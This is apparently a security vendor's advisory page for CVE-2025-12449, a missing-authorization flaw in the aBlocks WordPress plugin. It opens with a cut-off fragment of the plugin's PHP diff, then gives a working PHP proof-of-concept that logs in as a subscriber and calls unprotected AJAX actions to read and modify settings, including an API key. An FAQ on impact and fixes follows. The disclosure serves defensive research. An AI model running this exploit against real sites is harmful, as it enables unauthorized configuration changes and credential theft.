+			$css['display'] = 'flex';
+		if ( $device === 'Tablet' ) {
+			$css['flex-direction'] = 'column';
+		} elseif ( $device === 'Mobile' ) {
+			$css['flex-direction'] = 'column';
+		} else {
+			$css['flex-direction'] = 'row';
+		}
+
+		if ( ! empty( $attributes['bothGap'] ) ) {
+			$css['gap'] = $attributes['bothGap'] . 'px';
+		}
+		return array_merge(
+			$css
+		);
+	}
+
+	// * Render the block content.
+	public function render_block_content( $attributes, $content, $block_instance ) {
+
+		global $wp;
+		global $wpdb;
+
+		$dashboard_page = isset( $attributes['dashboard_page'] ) && ! empty( $attributes['dashboard_page'] ) ? $attributes['dashboard_page'] : 'root';
+
+		$dashboard_pages = json_decode( get_option( ABLOCKS_FRONTEND_DASHBOARD_SUB_PAGES_SETTINGS_NAME, '{}' ), true );
+		// print_r($dashboard_pages);
+		$breadcrumbs = [];
+		$breadcrumbs[] = [
+			'label' => __( 'Dashboard', 'ablocks' ),
+			'url'   => $this->get_frontend_dashboard_endpoint_url( '' ),
+		];
+		$current_slug = get_query_var( 'ablocks_dashboard_page', 'root' );
+
+		if ( $current_slug !== 'root' ) {
+			// Find the current page in the dashboard_pages array
+			foreach ( $dashboard_pages as $page ) {
+				if ( isset( $page['slug'] ) && $page['slug'] === $current_slug ) {
+					$breadcrumbs[] = [
+						'label' => $page['label'],
+						'url'   => isset( $page['permalink'] ) ? $page['permalink'] : $this->get_frontend_dashboard_endpoint_url( $page['slug'] ),
+					];
+					break;
+				}
+			}
+		}
+		?>
+		<div class="ablocks-frontend-dashboard-sidebar">
+			<div class="ablocks-frontend-dashboard-user">
+				<div id="ablocks-frontend-dashboard-user-avatar">
+					<?php echo get_avatar( get_current_user_id(), 96, '', wp_get_current_user()->display_name, [ 'loading' => 'lazy' ] ); ?>
+					<span class="ablocks-frontend-dashboard-user__label"><?php echo esc_html( wp_get_current_user()->display_name ); ?></span>
+				</div>
+			</div>
+			<ul class="ablocks-frontend-dashboard-menu">
+				<?php
+				foreach ( $dashboard_pages as $menu ) :
+					// print_r($menu);
+					$endpoint = $menu['slug'];
+					$menu['permalink'] = $menu['permalink'] ?? $menu['link'] ?? null;
+					if ( $endpoint === 'root' ) {
+						$menu['label'] = __( 'Dashboard', 'ablocks' );
+						$menu['slug']  = '';
+						$menu['priority'] = 0;
+					} ?>
+					<li class="ablocks-frontend-dashboard-menu__item ablocks-frontend-dashboard-menu__item--<?php echo esc_attr( $endpoint ); ?> <?php echo esc_attr( $menu['class_name'] ?? '' ); ?> <?php echo get_query_var( 'ablocks_dashboard_page' ) === $endpoint || ( get_query_var( 'ablocks_dashboard_page' ) === '' && 'index' === $endpoint ) ? 'ablocks-frontend-dashboard-menu__item--current' : ''; ?>">
+						<a href="<?php echo esc_url( isset( $menu['permalink'] ) ? $menu['permalink'] : $this->get_frontend_dashboard_endpoint_url( $endpoint ) ); ?>">
+							<i class="<?php if ( ! empty( $menu['icon'] ) ) {
+								echo esc_html( $menu['icon'] );} ?>"></i>
+							<span class="ablocks-frontend-dashboard-menu__item-label"><?php echo esc_html( $menu['label'] ); ?></span>
+						</a>
+
+						<?php if ( ! empty( $menu['children'] ) ) : ?>
+							<ul class="ablocks-frontend-dashboard-menu__submenu">
+								<?php foreach ( $menu['children'] as $child ) : ?>
+									<?php
+
+										$child['permalink'] = $child['permalink'] ?? $child['link'] ?? null;
+									?>
+									<li  clas="<?php echo esc_attr( $child['class_name'] ?? '' ); ?>"><a href="<?php echo esc_url( isset( $child['permalink'] ) ? $child['permalink'] : $this->get_frontend_dashboard_endpoint_url( $child['slug'] ) ); ?>">
+										<i class="<?php if ( ! empty( $child['icon'] ) ) {
+											echo esc_html( $child['icon'] );} ?>"></i>
+										<?php echo esc_html( $child['label'] ); ?>
+									</a></li>
+								<?php endforeach; ?>
+							</ul>
+						<?php endif; ?>
+					</li>
+				<?php endforeach; ?>
+			</ul>
+
+		</div>
+		<div class="ablocks-frontend-dashboard-content">
+			<!-- Breadcrumb -->
+			<ul class="ablocks-frontend-dashboard-breadcrumb">
+				<?php foreach ( $breadcrumbs as $crumb ) :
+					?>
+					<li>
+						<?php echo esc_html( $crumb['label'] ); ?>
+					</li>
+				<?php endforeach; ?>
+			</ul>
+			<?php
+			if ( Helper::is_gutenberg_editor() ) {
+				self::render_dashboard_page_by_slug( $dashboard_page );
+				// Show Notice for empty pages
+				if ( ! is_array( $dashboard_pages ) || ! count( $dashboard_pages ) ) {
+					echo 'Dashboard Page is empty. You haven't created any dashboar

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12449 - aBlocks – WordPress Gutenberg Blocks <= 2.4.0 - Missing Authorization to Authenticated (Subscriber+) Settings Modification

<?php
/**
 * Proof of Concept for CVE-2025-12449
 * Demonstrates unauthorized access to aBlocks plugin settings
 * Requires valid WordPress subscriber credentials
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Initialize cURL session for WordPress login
$ch = curl_init();

// Step 1: Get login page to retrieve nonce and cookies
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);

// Extract nonce from login form (simplified - real implementation would parse HTML)
// For demonstration, we assume direct POST login works

// Step 2: Authenticate to WordPress
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$login_response = curl_exec($ch);

// Step 3: Exploit missing authorization to read plugin settings
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$exploit_payload = [
    'action' => 'get_settings'
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_payload));
$settings_response = curl_exec($ch);

echo "[+] Retrieved plugin settings:n";
echo $settings_response . "nn";

// Step 4: Attempt to modify settings (example: change maintenance mode)
$modify_payload = [
    'action' => 'save_settings',
    'enabled_maintenance_page' => 'true',
    'maintenance_page' => '2',  // Page ID for maintenance page
    'mailchimp_api_key' => 'stolen_key_here'  // Would be modified in real attack
];

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($modify_payload));
$modify_response = curl_exec($ch);

echo "[+] Settings modification response:n";
echo $modify_response . "nn";

// Step 5: Read block visibility settings
$visibility_payload = [
    'action' => 'get_blocks_visibility'
];

curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($visibility_payload));
$visibility_response = curl_exec($ch);

echo "[+] Block visibility settings:n";
echo $visibility_response . "n";

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-12449?
Overview of the vulnerability
CVE-2025-12449 is a security vulnerability in the aBlocks WordPress plugin, affecting versions up to and including 2.4.0. It allows authenticated users with subscriber-level access and above to modify sensitive plugin settings due to missing authorization checks on AJAX actions.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from the absence of capability checks in several AJAX endpoints. Authenticated users can send requests to these endpoints to read and modify plugin settings, including sensitive API keys and configuration data, without proper permissions.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the aBlocks plugin version 2.4.0 or earlier is affected. Specifically, authenticated users with subscriber-level access or higher can exploit this vulnerability to access sensitive information.
How can I check if my site is vulnerable?
Steps to identify vulnerability
To determine if your site is vulnerable, check the version of the aBlocks plugin installed. If it is version 2.4.0 or earlier, your site is at risk. You can also review the AJAX actions in the plugin code for missing capability checks.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is addressed in version 2.4.1 of the aBlocks plugin. Updating to this version will implement the necessary capability checks and mitigate the risk associated with CVE-2025-12449.
What if I cannot update the plugin immediately?
Mitigation strategies
If immediate updating is not possible, consider disabling the aBlocks plugin temporarily to prevent exploitation. Additionally, review user roles and permissions to limit access for authenticated users.
What does the CVSS score of 5.4 signify?
Understanding the severity rating
A CVSS score of 5.4 indicates a medium severity level for this vulnerability. This means that while it is not critical, there is a significant risk of data exposure and unauthorized modifications that could impact site integrity.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can lead to unauthorized access to sensitive API keys, which may allow attackers to compromise external services. Additionally, attackers can modify site settings, potentially disrupting site functionality and user experience.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration of exploitation
The proof of concept illustrates how an authenticated user can exploit the vulnerability by sending a POST request to the vulnerable AJAX endpoints. It shows the steps to log in and retrieve sensitive settings without proper authorization checks.
What specific actions are vulnerable in the plugin?
Identifying affected AJAX actions
The vulnerable AJAX actions include `get_settings`, `save_settings`, `get_blocks_visibility`, and `save_blocks_visibility`. These actions allow users to read and modify sensitive plugin settings without appropriate permissions.
Is there a risk of remote code execution?
Understanding the exploitation scope
No, this vulnerability does not directly allow for remote code execution. However, it exposes sensitive data that could facilitate further attacks on integrated services, making it important to address promptly.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations